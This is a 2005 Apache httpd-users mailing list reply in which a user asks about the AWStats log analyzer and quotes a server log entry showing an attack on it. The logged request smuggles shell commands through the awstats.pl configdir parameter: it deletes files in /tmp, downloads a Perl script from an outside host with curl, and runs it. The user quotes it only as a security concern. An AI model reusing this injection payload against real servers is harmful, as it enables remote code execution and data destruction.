httpd-users mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From "David P. Donahue" <ddona...@ccs.neu.edu>
Subject Re: [users@httpd] Can Anyone Recommend A Log Analyzer?
Date Sat, 12 Nov 2005 22:52:07 GMT
> http://awstats.sourceforge.net/

Looks good.  One thing that concerns me, though.  The name sounded 
familiar because of some attempts made on my web server from time to 
time.  I notice entries like the following in my logs (sorry for any 
wrapping):

host-216-153-162-21.pro.choiceone.net - - [13/Sep/2005:10:52:04 -0400] 
"GET 
/awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;curl%20-O%20http://www.geocities.com/h4x000r/a.pl;perl%20a.pl;echo%20;rm%20-rf%20a.pl*;echo|

HTTP/1.1" 404 12682 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

On one such occasion I even went and downloaded the PERL script to which 
it links and looked through the code.  Pretty unsettling.  As with any 
service, security is always a concern.  But it concerned me that attacks 
were being directed at this awstats package.

Is there anything I should know before just loading it up and running it?


Regards,
David P. Donahue
ddonahue@ccs.neu.edu

---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
   "   from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org


Mime
View raw message